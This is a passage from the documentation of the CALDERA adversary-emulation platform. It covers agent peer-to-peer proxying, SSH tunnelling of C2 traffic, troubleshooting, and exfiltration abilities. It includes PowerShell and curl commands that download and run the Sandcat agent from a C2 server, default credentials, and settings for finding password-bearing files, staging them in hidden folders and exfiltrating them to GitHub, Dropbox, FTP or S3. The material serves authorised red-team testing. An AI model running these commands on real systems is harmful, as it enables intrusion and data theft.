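echo "python3 $DECRYPTOR --config $CONFIG $ENCRYPTED" > /tmp/decrypt_cmd.sh
cat /tmp/decrypt_cmd.sh
```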
SIXTEEN
PEER-TO-PEER PROXY FUNCTIONALITY FOR SANDCAT AGENTS
In certain scenarios, an agent may start on a machine that can’t directly connect to the C2 server. For instance, agent
A may laterally move to a machine that is on an internal network and cannot beacon out to the C2. By giving agents
peer-to-peer capabilities, users can overcome these limitations. Peer-to-peer proxy-enabled agents can relay messages
and act as proxies between the C2 server and peers, giving users more flexibility in their Caldera operations.
This guide will explain how Sandcat incorporates peer-to-peer proxy functionality and how users can include it in their
operations.
By default, a Sandcat agent will try to connect to its defined C2 server using the provided C2 protocol (e.g. HTTP).
Under ideal circumstances, the requested C2 server is valid and reachable by the agent, and no issues occur. Because
an agent cannot guarantee that the requested C2 server is valid, that the requested C2 protocol is valid and supported,
or that the C2 server is even reachable, the agent will fall back to peer-to-peer proxy methods as a backup. The order
of events is as follows:
1. Agent checks if the provided C2 protocol is valid and supported. If not, the agent resorts to peer-to-peer proxy.
2. If the C2 protocol is valid and supported, the agent will try to reach out to the provided C2 server using that
protocol. If the agent gets a successful Beacon, then it continues using the established C2 protocol and server.
If the agent misses 3 Beacons in a row (even after having successfully Beaconed in the past), then the agent will
fall back to peer-to-peer proxy.
When falling back to peer-to-peer proxy methods, the agent does the following:
1. Search through all known peer proxy receivers and see if any of their protocols are supported.
2. If the agent finds a peer proxy protocol it can use, it will switch its C2 server and C2 protocol to one of the available
corresponding peer proxy locations and the associated peer proxy protocol. For example, if an agent cannot
successfully make HTTP requests to the C2 server at http://10.1.1.1:8080, but it knows that another agent
is proxying peer communications through an SMB pipe path available at \\WORKSTATION\pipe\proxypipe,
then the agent will check if it supports SMB Pipe peer-to-peer proxy capabilities. If so (i.e. if the associated
gocat extension was included in the Sandcat binary), then the agent will change its server to
\\WORKSTATION\pipe\proxypipe and its C2 protocol to SmbPipe.
The agent also keeps track of which peer proxy receivers it has tried so far, and it will round-robin through each one
it hasn’t tried until it finds one it can use. If the agent cannot use any of the available peer proxy receivers, or if they
happen to all be offline or unreachable, then the agent will pause and try each one again.
Since an agent that requires peer-to-peer communication can't reach the C2 server, it needs a way to obtain the available
proxy peer receivers (their protocols and where to find them). Currently, Caldera achieves this by including available
peer receiver information in the dynamically-compiled binaries. When agents hosting peer proxy receivers check in
through a successful beacon to the C2, the agents will include their peer-to-peer proxy receiver addresses and
corresponding protocols, if any. The C2 server will store this information to later include in a dynamically compiled
binary upon user request.
Users can compile a Sandcat binary that includes known available peer-to-peer receivers (their protocols and locations),
by using the includeProxyPeers header when sending the HTTP requests to the Caldera server for agent binary
compilation. In order for a receiver to be included, the agent hosting the receiver must be trusted, and the peer-to-peer
protocol for the receiver must be included in the header value.
The header value can take one of the following formats:
• All : include all available receivers
• protocol1,protocol2,protocol3 : include only the proxy receivers that follow the requested protocols
(comma-separated).
• !protocol1,protocol2,protocol3 : include all available receivers, EXCEPT those that use the indicated
protocols.
By specifying protocols, users have greater control over their agents’ communication, especially when they do not want
particular protocols to appear in the local network traffic.
For example, suppose trusted agents A, B, C are each running HTTP proxy receivers at network addresses
http://10.1.1.11:8081, http://10.1.1.12:8082, http://10.1.1.13:8083, respectively. The peer-to-peer proxy protocol
is HTTP. When compiling a binary with the HTTP header includeProxyPeers:All or includeProxyPeers:HTTP,
the binary will contain all 3 URLs for the agent to use in case it cannot connect to the specified C2.
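A hedged sketch of such a compile request (the server address is a placeholder; the headers follow the download pattern shown elsewhere in this documentation):

```shell
# Record the compile-request headers; includeProxyPeers restricts the embedded
# peer list to HTTP receivers. SERVER is a placeholder address.
SERVER="http://192.168.137.122:8888"
printf '%s\n' "file:sandcat.go" "platform:linux" "includeProxyPeers:HTTP" \
    > /tmp/compile_headers.txt
# Issue the request; it fails harmlessly when no CALDERA server is reachable.
curl -s --connect-timeout 3 -X POST \
    -H "file:sandcat.go" -H "platform:linux" -H "includeProxyPeers:HTTP" \
    "$SERVER/file/download" -o /tmp/sandcat.go \
    || echo "download skipped (no reachable server in this sketch)"
```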
To leverage peer-to-peer functionality, one or more gocat extensions may need to be installed. This can be done
through cradles by including the gocat-extensions header when sending HTTP requests to the Caldera server for
dynamic Sandcat compilation. The header value will be a comma-separated list of all the desired extensions (e.g.
proxy_method1,proxy_method2). If the requested extension is supported and available within the user’s current
Caldera installation, then the extension will be included.
Quickstart
Starting Receivers
To start an agent with peer-to-peer proxy receivers, the -listenP2P commandline switch must be used (no parameters
taken). When this switch is set, the agent will activate all supported peer-to-peer proxy receivers.
Example powershell commands to start an agent with HTTP and SMB Pipe receivers:
$url="http://192.168.137.122:8888/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_http,proxy_smb_pipe"); # Include gocat extensions for the proxy protocols.
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P;
In cases where operators know ahead of time that a newly spawned agent cannot directly connect to the C2, they can
use the existing command-line options for Sandcat to have the new agent connect to a peer. To do so, the -c2 and
-server options are set to the peer-to-peer proxy protocol and address of the peer’s proxy receiver, respectively.
For example, suppose trusted agent A is running an SMB pipe proxy receiver at pipe path
\\WORKSTATION1\pipe\agentpipe. Instead of compiling a new agent using the HTTP header includeProxyPeers:All or
includeProxyPeers:SmbPipe to include the pipe path information in the binary, operators can simply specify -c2
SmbPipe and -server \\WORKSTATION1\pipe\agentpipe in the command to run the agent. Note that in this instance,
the appropriate SMB pipe proxy gocat extension will need to be installed when compiling the agent binaries.
Example powershell commands to start an agent and have it directly connect to a peer’s SMB pipe proxy receiver:
$url="http://192.168.137.122:8888/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_smb_pipe"); # Required extension for SMB Pipe proxy.
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
# ...
# ... transfer SMB Pipe-enabled binary to new machine via lateral movement technique
# ...
In complex circumstances, operators can create proxy chains of agents, where communication with the C2 traverses
several hops through agent peer-to-peer links. The peer-to-peer proxy links do not need to all use the same proxy
protocol. If an agent is running a peer-to-peer proxy receiver via the -listenP2P command-line flag, and if the agent
uses peer-to-peer communications to reach the C2 (either automatically or manually), then the chaining will occur
automatically without additional user interaction.
Manual example: run peer proxy receivers while also manually connecting to another agent's pipe to communicate with
the C2, by combining the -listenP2P flag with the -c2 SmbPipe and -server options described above.
At the core of the Sandcat peer-to-peer functionality are the peer-to-peer clients and peer-to-peer receivers. Agents
can operate one or both, and can support multiple variants of each. For instance, an agent that cannot directly reach
the C2 server would run a peer-to-peer client that will reach out to a peer-to-peer receiver running on a peer agent.
Depending on the gocat extensions that each agent supports, an agent could run many different types of peer-to-peer
receivers simultaneously in order to maximize the likelihood of successful proxied peer-to-peer communication.
Direct communication between the Sandcat agent and the C2 server is defined by the Contact interface in the contact.go
file within the contact gocat package. Because all peer-to-peer communication eventually gets proxied to the C2
server, agents essentially treat their peer proxy receivers as just another server.
The peer-to-peer proxy receiver functionality is defined in the P2pReceiver interface in the proxy.go file within the
proxy gocat package. Each implementation requires the following:
• Method to initialize the receiver
• Method to run the receiver itself as a go routine (provide the forwarding proxy functionality)
• Methods to update the upstream server and communication implementation
• Method to cleanly terminate the receiver
• Method to get the local receiver addresses
The Sandcat agent currently supports one peer-to-peer proxy: a basic HTTP proxy. Agents that want to use the HTTP
peer-to-peer proxy can connect to the C2 server via an HTTP proxy running on another agent. Agent A can start an
HTTP proxy receiver (essentially a proxy listener) and forward any requests/responses. Because the nature of an HTTP
proxy receiver implies that the running agent will send HTTP requests upstream, an agent must be using the HTTP c2
protocol in order to successfully provide HTTP proxy receiver services.
The peer-to-peer HTTP client is the same HTTP implementation of the Contact interface, meaning that an agent simply
needs to use the HTTP c2 protocol in order to connect to an HTTP proxy receiver.
In order to run an HTTP proxy receiver, the Sandcat agent must have the proxy_http gocat extension installed.
Example commands:
$url="http://192.168.137.122:8888/file/download";
$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_http");
$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P
SEVENTEEN
C2 COMMUNICATIONS TUNNELING
In addition to built-in contact methods such as HTTP, DNS, TCP, and UDP, CALDERA also provides support for
tunneling C2 traffic, which supporting agents can use to mask built-in contact methods for added defense evasion.
Currently, the only available tunneling method is SSH tunneling, which is only supported by the sandcat agent.
Sandcat agents can use SSH tunneling to tunnel C2 contact mechanisms, namely HTTP(S). CALDERA also provides
built-in support to spin up a minimal local SSH server for SSH tunneling.
Within the CALDERA configuration file, adjust the following entries according to your environment:
• app.contact.tunnel.ssh.host_key_file: File name for the server's SSH private host key. You can generate
your own SSH private host key for the CALDERA server. The file must reside in the conf/ssh_keys
directory. If the CALDERA server cannot find or read the provided private host key, it will generate a temporary
RSA host key to use for operations. Although this would cause security warnings under normal circumstances,
the sandcat agent implementation of SSH tunneling does not attempt to verify hosts, and thus should not be
affected by changing or temporary host keys.
• app.contact.tunnel.ssh.host_key_passphrase: Passphrase for the server's SSH private host key. The
server will use this passphrase to read the private host key file provided in
app.contact.tunnel.ssh.host_key_file.
• app.contact.tunnel.ssh.socket: Indicates the IP address and port that the CALDERA server will listen
on for SSH tunneling connections (e.g. 0.0.0.0:8022).
• app.contact.tunnel.ssh.user_name: User name that agents will use to authenticate to the CALDERA
server via SSH. The default value is sandcat.
• app.contact.tunnel.ssh.user_password: Password that agents will use to authenticate to the CALDERA
server via SSH. The default value is s4ndc4t!.
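Collected in one place, the five entries above might look as follows in the configuration file (values are the documented defaults or illustrative examples, not recommendations):

```shell
# Write the tunneling-related config entries and count them.
cat > /tmp/ssh_tunnel_conf.yml <<'EOF'
app.contact.tunnel.ssh.host_key_file: ssh_host_key
app.contact.tunnel.ssh.host_key_passphrase: example_passphrase
app.contact.tunnel.ssh.socket: 0.0.0.0:8022
app.contact.tunnel.ssh.user_name: sandcat
app.contact.tunnel.ssh.user_password: s4ndc4t!
EOF
grep -c 'app.contact.tunnel.ssh' /tmp/ssh_tunnel_conf.yml   # prints 5
```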
Once the configuration entries are set, simply start the CALDERA server as normal via the server.py Python
program, and CALDERA will automatically attempt to start an SSH server that listens on the specified socket
(app.contact.tunnel.ssh.socket).
The contact will first attempt to read the host private key file specified by app.contact.tunnel.ssh.host_key_file,
using the passphrase specified by app.contact.tunnel.ssh.host_key_passphrase. If it cannot read the file for any
reason (e.g. the file does not exist, or the passphrase is incorrect), then the server will generate its own temporary
private key to use for the server.
The SSH server should only be used between agents and the C2 server and should not be used to SSH into the
CALDERA server manually (e.g. to manage the server remotely).
The sandcat agent is currently the only agent that supports SSH tunneling. To use it, the server, tunnelProtocol,
tunnelAddr, tunnelUser, and tunnelPassword arguments must be used.
• server value is the CALDERA server endpoint that the tunnel will connect to - if the agent is tunneling HTTP
communications through SSH, then server should be the HTTP socket for the CALDERA C2 server (e.g.
http://10.10.10.15:8888).
• tunnelProtocol value is the name of the tunneling mechanism that the agent is using. For SSH, the value must
be SSH.
• tunnelAddr is the port number or IP:port combination that indicates which port or socket to connect to via SSH
to start the tunnel (e.g. 8022 or 10.10.10.15:8022). If only a port number is provided, the agent will try to
connect to the IP address from server using the specified port. The server listening on the port/socket should
be listening for SSH connections from agents.
• tunnelUser indicates which username to use to authenticate to tunnelAddr via SSH. This username should
match the CALDERA configuration value for app.contact.tunnel.ssh.user_name.
• tunnelPassword indicates which password to use to authenticate to tunnelAddr via SSH. This password
should match the CALDERA configuration value for app.contact.tunnel.ssh.user_password.
To tunnel different contacts through SSH tunneling, simply adjust the c2 and server values as needed.
When authenticating to the provided SSH server, the sandcat agent will use the username/password provided
by the tunnelUser and tunnelPassword arguments. Whatever credentials the agent uses must reflect the
CALDERA configuration values specified in app.contact.tunnel.ssh.user_name and
app.contact.tunnel.ssh.user_password. The agent will then open a random local port to act as the local endpoint of
the SSH tunnel. This local endpoint becomes the upstream_dest value for the agent.
The following commandline will start a sandcat agent that will open an SSH tunnel to the CALDERA c2 server at
192.168.140.1:8022; the tunneled communications will be sent to the c2 server's HTTP endpoint at
192.168.140.1:8888:
server="http://192.168.140.1:8888";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;
chmod +x sandcat.go;
./sandcat.go -server $server -v -tunnelProtocol SSH -tunnelAddr 8022 -tunnelUser sandcat -tunnelPassword s4ndc4t!
The above Linux agent will produce verbose output similar to the following:
Starting sandcat in verbose mode.
[*] Starting SSH tunnel
Starting local tunnel endpoint at localhost:52649
Setting server tunnel endpoint at 192.168.140.1:8022
Setting remote endpoint at localhost:8888
[*] Listening on local SSH tunnel endpoint
[*] SSH tunnel ready and listening on http://localhost:52649.
[*] Attempting to set channel HTTP
Beacon API=/beacon
[*] Set communication channel to HTTP
The agent connected to the C2 server via SSH at 192.168.140.1:8022 and opened a local SSH tunnel on local port
52649 that tunnels HTTP traffic to the C2 server at 192.168.140.1:8888. This is the equivalent of running ssh -L
52649:localhost:8888 sandcat@192.168.140.1 -p 8022 -N.
Note that the agent's upstream destination endpoint is set to the local SSH tunnel endpoint at
http://localhost:52649 (the protocol is set to http since the agent is tunneling HTTP comms), while the true server
value is the final tunnel destination at http://192.168.140.1:8888.
If running the CALDERA c2 server with logging verbosity set to DEBUG, you may see output similar to the following
when an agent connects via SSH tunneling:
2021-03-26 09:12:43 - INFO (logging.py:79 log) [conn=2] Accepted SSH connection on 192.168.140.1, port 8022
2021-03-26 09:12:43 - DEBUG (logging.py:79 log) [conn=2, chan=0] Set write buffer limits: low-water=16384, high-water=65536
2021-03-26 09:12:43 - INFO (logging.py:79 log) [conn=2] Accepted direct TCP connection request to localhost, port 8888
Once the tunnel is established, operators can proceed as normal with agent activity and operations.
EIGHTEEN
UNINSTALL CALDERA
To uninstall CALDERA, navigate to the directory where CALDERA was installed and recursively remove the directory
using the following command:
rm -rf caldera/
CALDERA may leave behind artifacts from deployment of agents and operations. Remove any remaining CALDERA
agents, files, directories, or other artifacts left on your server and remote systems:
rm [ARTIFACT_NAME]
Generated reports and exfiltrated files are saved in /tmp on the server where CALDERA is installed.
Some examples of CALDERA artifacts left by agents (on server if agent ran locally, on clients if run remotely):
• sandcat.go: sandcat agent
• manx.go: manx agent
• nohup.out: output file from deployment of certain sandcat and manx agents
NINETEEN
TROUBLESHOOTING
1. Ensure that CALDERA has been cloned recursively. Plugins are stored in submodules and must be cloned along
with the core code.
2. Check that Python 3.7+ is installed and being used.
3. Confirm that all pip requirements have been fulfilled.
4. Run the CALDERA server with the --log DEBUG parameter to see if there is additional output.
5. Consider removing the conf/local.yml and letting CALDERA recreate the file when the server runs again.
If you get an error like ModuleNotFoundError: No module named 'plugins.manx.app' when starting
CALDERA:
1. Check to see if the plugins/manx folder is empty
1. Ensure that CALDERA has been cloned recursively. Plugins are stored in submodules and must be cloned
along with the core code.
2. Alternatively, from the plugins folder, you can run git clone https://github.com/mitre/manx.git
to grab only the manx repo.
2. Check your conf/local.yml to make sure manx is enabled
CALDERA has a backup, cleanup, and save procedure that runs when the key combination CTRL+C is pressed. This is the recommended method to ensure proper shutdown of the server. If the Python process executing CALDERA is halted abruptly (for example, via SIGKILL), information from plugins can be lost and configuration changes may not be reflected on a server restart.
1. Check the server logs for the incoming connection. If there is no connection:
1. Check for any output from the agent download command which could give additional information.
2. Make sure the agent is attempting to connect to the correct address (not 0.0.0.0 and likely not 127.0.0.1).
3. Check that the listen interface is the same interface the agent is attempting to connect to.
4. Check that the firewall is open, allowing network connections, between the remote computer running the
agent and the server itself.
2. Ensure Go is properly installed (required to dynamically compile Sandcat):
1. Make sure the Go environment variables are properly set. Ensure the PATH variable includes the Go
binaries by adding this to the /etc/profile or similar file:
export PATH=$PATH:/usr/local/go/bin
2. If there are issues with a specific package, run something like the following:
go get -u github.com/google/go-github/github
go get -u golang.org/x/oauth2
1. Run the agent with the -v flag and without the -WindowStyle hidden parameter to view output.
2. Consider removing bootstrap abilities so the console isn’t cleared.
19.5 Operations
1. Ensure that at least one agent is running before running the operation.
1. Check that the agent is running either on the server or in the agent-specific settings under last checked in
time.
2. Alternatively, clear out the running agent list using the red X’s. Wait for active agents to check in and
repopulate the table.
1. Files are encrypted by default and can be decrypted with the following utility: https://github.com/mitre/caldera/blob/master/app/utility/file_decryptor.py
TWENTY
RESOURCES
The following file contains a list of Caldera’s abilities in comma-separated value (CSV) format.
abilities.csv
TWENTYONE
This document will discuss how to utilize various exfiltration abilities within CALDERA, specifically focused on the
following abilities:
• Advanced File Search and Stager
• Find Git Repositories & Compress Git Repository (local host)
• Compress Staged Directory (Password Protected) – 7z and tar+gpg
• Compress Staged Directory (Password Protected) and Break Into Smaller Files
• Exfil Compressed Archive to FTP
• Exfil Compressed Archive to Dropbox
• Exfil Compressed Archive to GitHub Repositories | Gists
– Additionally: Exfil Directory Files to Github
• Exfil Compressed Archive to S3 via AWS CLI
• Transfer Compressed Archive to Separate S3 Bucket via AWS CLI
• Scheduled Exfiltration (uses the standard HTTP C2 channel)
Note: the exfiltration abilities (to GitHub, Dropbox, FTP, and AWS) require a compressed archive with a corresponding
host.dir.compress fact unless otherwise noted.
If you want to skip straight to an example, click here
21.1 Setup
To fully capitalize on the exfiltration abilities, you will need to do a little setup on the far end to receive the exfiltrated data.
21.1.1 Dropbox
If you do not have a Dropbox account already, you can obtain a free account (with storage size limitations) by navigating to the signup page for a basic account and filling in the required information.
Once you have an activated account, navigate to the App Center and select 'Manage'. In the left-hand toolbar, near the bottom, select 'Build an App'. The app name must be unique; fill out the requested information.
Generate an access token and set it for the desired expiration time (default as of this document is 4 hours). You may
need to update your access token periodically prior to operations.
On the permissions tab, grant the application read and write access for files and folders, then submit the application.
Uploaded files should appear under Apps/AppName/FolderName if you elected to segregate app folders.
21.1.2 GitHub Repository
Chances are you already have a GitHub account if you're using this platform. Create a new repository per the standard
instructions. If you do not already have a private access token, you can create it under Settings > Developer Settings >
Personal Access Tokens. Select if you want the token to also apply to Gists while you’re here.
You can commit directly to main if desired, or you can use a branch for your operations (just be sure to update the
fact source with the desired branch, discussed below). Keep track of your GitHub username, access token, and branch
name for the fact source.
21.1.3 GitHub Gist
This is a much simpler case - simply have a GitHub account and obtain an access token as described above (Settings >
Developer Settings > Personal Access Tokens). Ensure the access token also applies to Gists if you already have one.
Keep track of the access token and your username for the fact source.
21.1.4 FTP
There are a number of ways to start an FTP server depending on your OS; start the service per your operating system's requirements. Note that some FTP services disallow writable chroots. To work around this, either allow writable chroots or designate a specific folder for CALDERA uploads and supply that folder in the fact source.
For example, with vsftpd you can either:
• Edit /etc/vsftpd.conf to include allow_writeable_chroot=YES
• Supply a writable folder in addition to the FTP server address in the CALDERA fact source. E.g. value:
192.168.1.2/upload
21.1.5 AWS
The exfiltration via AWS CLI abilities assume the AWS CLI is installed on the host machine. For use with an IAM
user, the proper credentials (access key, secret access key, and also session token if using MFA) must be provided for
the [default] profile in ~/.aws/credentials. The [default] profile may require some additional setup with the
correct region and output within ~/.aws/config.
For exfiltration to an S3 bucket, permissions must be in place to allow the [default] profile read/write access to the target S3 bucket (examples: s3:ListBucket, s3:PutObject).
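As a sketch, a minimal IAM policy granting the [default] profile that access might look like the following (the bucket name caldera-exfil-bucket is a placeholder):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::caldera-exfil-bucket"
    },
    {
      "Effect": "Allow",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::caldera-exfil-bucket/*"
    }
  ]
}
```

Note that s3:ListBucket applies to the bucket ARN itself, while s3:PutObject applies to the objects within it (the /* suffix).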
For transferring data to a separate S3 bucket, proper policies must be configured in the source AWS account to allow listing (s3:ListBucket) and getting (s3:GetObject) objects from the source S3 bucket, in addition to listing, putting objects, and setting the ACL when putting (s3:PutObjectAcl) an object to the destination S3 bucket. Policies must also be configured in the destination AWS account to allow the source AWS account to put objects and set the object's ACL in the destination S3 bucket. This ensures that objects transferred to the destination account automatically become owned by the destination bucket owner, who will then have full control of the transferred objects.
21.2 Fact Sources
CALDERA uses facts in its operations to collect and act upon information of import. For more general information, see the docs. To aid in exfiltration testing, Stockpile contains a fact source for basic testing with the various facts consumed by the abilities listed above (data/sources/2ccb822c-088a-4664-8976-91be8879bc1d). Note that this does not include all facts used by other exfiltration abilities in CALDERA, such as those offered by the Atomic plugin.
Most of the fact source is commented out by default, except for the search-and-stage ability. To plan an operation, first consider the various file searching and staging options available. The source file contains information on the options available to you as the user, along with the required formatting and default values as examples.
Review the remaining facts and un-comment (remove the # at the start of the line) the applicable facts – both the trait
and value lines. For sections like GitHub, notes have been left regarding which facts are required for either exfil to
repositories or Gists. For example, only the first two facts below need to be un-commented and updated if using Gists:
# GitHub Exfiltration
# -------------------------------------
#- trait: github.user.name <--- Uncomment
# value: CHANGEME-BOTH <--- Uncomment & Update
#- trait: github.access.token <--- Uncomment
# value: CHANGEME-BOTH <--- Uncomment & Update
#- trait: github.repository.name
# value: CHANGEME-RepoOnly
#- trait: github.repository.branch
# value: CHANGEME-RepoOnly
If you’re planning a longer operation requiring other facts, feel free to add them to this file using the standard syntax.
21.3 Adversaries
Before diving into an example, one last thing you should be aware of: pre-built adversaries. You may already be familiar
with adversaries like Hunter and Thief – to give you a baseline, we’ve included four adversaries covering exfiltration
operations to Dropbox, FTP, and GitHub (1x Repository, 1x Gist). If you want to try them out quickly, simply create
the corresponding exfiltration destination account/service and run an operation as normal using Advanced Thief via [
Dropbox | FTP | GitHub Repo | GitHub Gist ] and the provided fact source with appropriate entries.
These adversaries work nearly identically, first finding and staging files using Advanced File Search and Stager and
compressing the staged directory via utility with a password. Once converted to an archive, the last ability is exfil to
the selected destination.
TWENTYTWO
AN EXAMPLE
First, ensure you have an account and that you have generated an access token as described above. In either the UI
(github.com) or via the command line interface, create a repository to house the exfiltrated data. If desired, additionally
create a branch. For this demo, we have selected ‘caldera-exfil-test’ as the repository and ‘demo-op’ as the branch. In
the source file, edit the section marked for GitHub as follows. In the event you choose to use the main branch, supply
that instead for the branch fact.
id: 2ccb822c-088a-4664-8976-91be8879bc1d
name: Exfil Operation
...
# GitHub Exfiltration
# -------------------------------------
- trait: github.user.name # <--- Uncommented
  value: calderauser # <--- Uncommented & Updated
- trait: github.access.token # <--- Uncommented
  value: ghp_dG90YWxseW1V1cG... # <--- Uncommented & Updated
- trait: github.repository.name # <--- Uncommented
  value: caldera-exfil-test # <--- Uncommented & Updated
- trait: github.repository.branch # <--- Uncommented
  value: demo-op # <--- Uncommented & Updated
...
With GitHub ready to go, it’s time to consider other operational facts. For this example, we will focus on a quick
smash-and-grab without any other actions. Returning to the source file, let’s look at the topic section for file search and
stage. While there are instructions in the file, we’ll cover a little more detail here.
To summarize the options, you can find files by extension and content, and cull the results with a variety of limiters: a modified timeframe (default: last 30 days) and/or an accessed timeframe (default: last 30 days), only searching certain directories (e.g. c:\users or /home), or explicitly excluding directories (e.g. any "Music" folders). Additionally, for Windows targets you can exclude certain extensions. This is largely to exclude executables from capture by the content search, which the Linux command can do inherently. The included source file has default values for many of these options but can easily be adjusted.
Looking first at how to identify content we want, we’ll discuss the extensions and content search. For extensions, you
can control Windows and Linux separately to account for different important file types between the operating systems.
For the extensions, you’ll note instructions in the file regarding format. These extensions should be provided in a
comma-separated list with no periods or asterisks as they are added in the payload. If you’re not picky, you can also
supply all or none.
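As an illustrative sketch of that formatting rule (this helper is hypothetical, not the actual payload code):

```python
def extension_patterns(fact_value):
    """Expand the comma-separated extension fact into glob patterns.

    The fact value must not contain '.' or '*'; those are added here,
    mirroring what the payload is described as doing.
    """
    if fact_value == "all":
        return ["*"]   # match every file
    if fact_value == "none":
        return []      # match nothing
    return [f"*.{ext.strip()}" for ext in fact_value.split(",")]
```

So a fact value of doc,docx would yield the patterns *.doc and *.docx.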
The content search looks inside of files for the given string(s). This is shared between operating systems; simply include
your terms of import (spaces are ok!) in a comma-separated list. By default, Linux will ignore any binary files when
performing this search; Windows targets should use the excluded extensions list.
For this example, we’ll leave the default values and be sure to exclude common binary files we might find from Windows.
...
# ---- Comma-separated values, do not include '.' or '*', these are added in the payload if needed. Example: doc,docx
# ---- May also use 'all' for INCLUDED extensions and 'none' for EXCLUDED extensions
- trait: linux.included.extensions
  value: txt,cfg,conf,yml,doc,docx,xls,xlsx,pdf,sh,jpg,p7b,p7s,p7r,p12,pfx
- trait: windows.included.extensions
  value: doc,xps,xls,ppt,pps,wps,wpd,ods,odt,lwp,jtd,pdf,zip,rar,docx,url,xlsx,pptx,ppsx,pst,ost,jpg,txt,lnk,p7b,p7s,p7r,p12,pfx
- trait: windows.excluded.extensions
  value: exe,jar,dll,msi,bak,vmx,vmdx,vmdk,lck
# ---- Comma-separated values to look for. Spaces are allowed in terms. May also use 'none'
- trait: file.sensitive.content
  value: user,pass,username,password,uname,psw
...
With the content identified, we may want to focus our efforts on areas that might contain sensitive documents to save
time in the operation and post-processing. Adversaries have been observed using similar tactics, limiting results to
certain directories or documents seeing use in a given time period. As with the extensions and content, the provided
source file has default values set, but they can easily be changed.
First, you can choose an information cutoff date. As with the extensions, you can specify ‘none’ if you do not wish to
limit the results. You can also pick one or the other (modified or accessed) if you only care about one metric. Simply
supply a negative integer value, which represents the number of past days from today to include. We’ll leave it with the
default here.
# ---- uses a boolean "or" - if a file was accessed in the desired timeframe but not modified in the timeframe, it will still be included
Next, let’s look at the directories. You can again supply comma-separated lists of directories or a single directory.
These items will be used as the root nodes for a recursive search within. The default is c:\users and /home, but we
have changed things up here to limit it to a folder containing test files.
If searching a directory like c:\users or /home, you will likely encounter folders you (or an attacker) do not much
care for. To address this, you can supply a comma-separated list of phrases to exclude from directory paths. These do
not need to be full paths and can include spaces. For the example below, we have excluded things like “Music” and
“saved games”, folders found by default in user directories. Because these folders aren’t likely in the test folder we’re
using, these shouldn’t be issues. Be sure to account for any folders that may contain information that would violate
your organization’s policy if it were to be published to a site outside of organizational control.
# ---- Comma-separated, does not need to be full paths. May also use 'none'
- trait: windows.excluded.directories
  value: links,music,saved games,contacts,videos,source,onedrive
- trait: linux.excluded.directories
  value: .local,.cache,lib
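A minimal sketch of how such exclusion phrases could be applied during the recursive search (the function and case-insensitive matching are assumptions for illustration, not the actual payload code):

```python
def is_excluded(path, excluded_phrases):
    """Return True if any excluded phrase appears in the directory path.

    Phrases need not be full paths and may contain spaces; matching is
    done case-insensitively here (an assumption).
    """
    lowered = path.lower()
    return any(phrase.strip().lower() in lowered
               for phrase in excluded_phrases.split(","))
```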
22.5 Staging
Next up, we'll discuss staging. Because this ability both searches and stages, users can specify where to move the files.
By default, Windows targets will stage to the user’s recycle bin and Linux targets will stage to /tmp as both of these
locations should be writable by default. In each case, the ability will create a hidden folder called “s” at these locations.
If changing the default location, be sure to include a full path. Because the Recycle Bin requires some processing to
get the user’s SID, you can instead use the string “Recycle Bin” which will be parsed into the correct location. As noted
in the instructions, if the staging directory is changed from the default, the ability does contain a fall-back in the event
the selected directory is not writable. These values are c:\users\public and /tmp.
# Include the full path or use "Recycle Bin". Fall-back in the payload file is "c:\
˓→users\public".
# Recycle Bin will attempt to create a staging folder at c:\$Recycle.Bin\{SID} which␣
˓→should be writable by default
# Takes given location and creates a hidden folder called 's' at the location.
- trait: windows.staging.location
value: Recycle Bin
# ---- Include the full path, ensure it's writable for the agent. Fallback is /tmp.␣
˓→Creates a hidden folder called .s
To support safe testing, the ability additionally has a safe mode option. It is disabled by default, in which case the ability will find all files matching the parameters set before. If this fact is changed to 'true', you can supply an identifying value which indicates a file is for testing. This identifying value must appear at the end of the file name, just before the extension. The default value is "_pseudo". If safe mode is enabled, CALDERA will not stage any files whose names do not end in "_pseudo".
To provide a few examples, if safe mode is on with the value “_pseudo”:
• interesting_file.docx – matches the requested extension – will not be staged
• interesting_content.txt – matches the requested content – will not be staged
• interesting_pseudo_data.doc – matches the requested content – will not be staged because "_pseudo" is in the wrong place
• uninteresting_file_pseudo.random – doesn't match the requested extension – will not be staged despite the "_pseudo"
• interesting_file_pseudo.docx – matches the requested extension – will be staged
• interesting_content_pseudo.txt – matches the requested content – will be staged
# ---- Safe Mode - Only stages files with the appropriate file ending if enabled (e.g. report_pseudo.docx)
- trait: safe.mode.enabled
  value: false
- trait: pseudo.data.identifier
  value: _pseudo
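The safe-mode rules above can be sketched as follows (a simplified model for illustration, not the actual payload code):

```python
def should_stage(filename, matches_search, safe_mode=False, identifier="_pseudo"):
    """Decide whether a matching file is staged under safe mode.

    A file is staged only if it matched the search criteria and, when
    safe mode is enabled, its name ends with the identifier immediately
    before the extension.
    """
    if not matches_search:
        return False
    if not safe_mode:
        return True
    stem = filename.rsplit(".", 1)[0]   # file name without its extension
    return stem.endswith(identifier)
```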
22.6 Compression
For this demonstration, we will be using the password-protected archive ability added in this update. The source
contains a default value of C4ld3ra but can be changed to anything if more security is required (e.g., real files used in
testing). As noted in the source file, certain special characters may be escaped when inserted into the command. This
may result in a different password than what you entered - view the operation logs to see exactly what was used. You
should still be able to decrypt the archive, but will need to include any escape characters added during the operation.
For example, Pa$$word may have become Pa\$\$word or Pa`$`$word.
# Encrypted Compression
# Note: For passwords with special characters like # and $, you may need to include escapes (\ or `)
# when re-entering the password to decrypt the archive. Examine the operation output to see the exact password used.
# If using special characters, put the password in 'single quotes' here to prevent parser errors.
# -------------------------------------
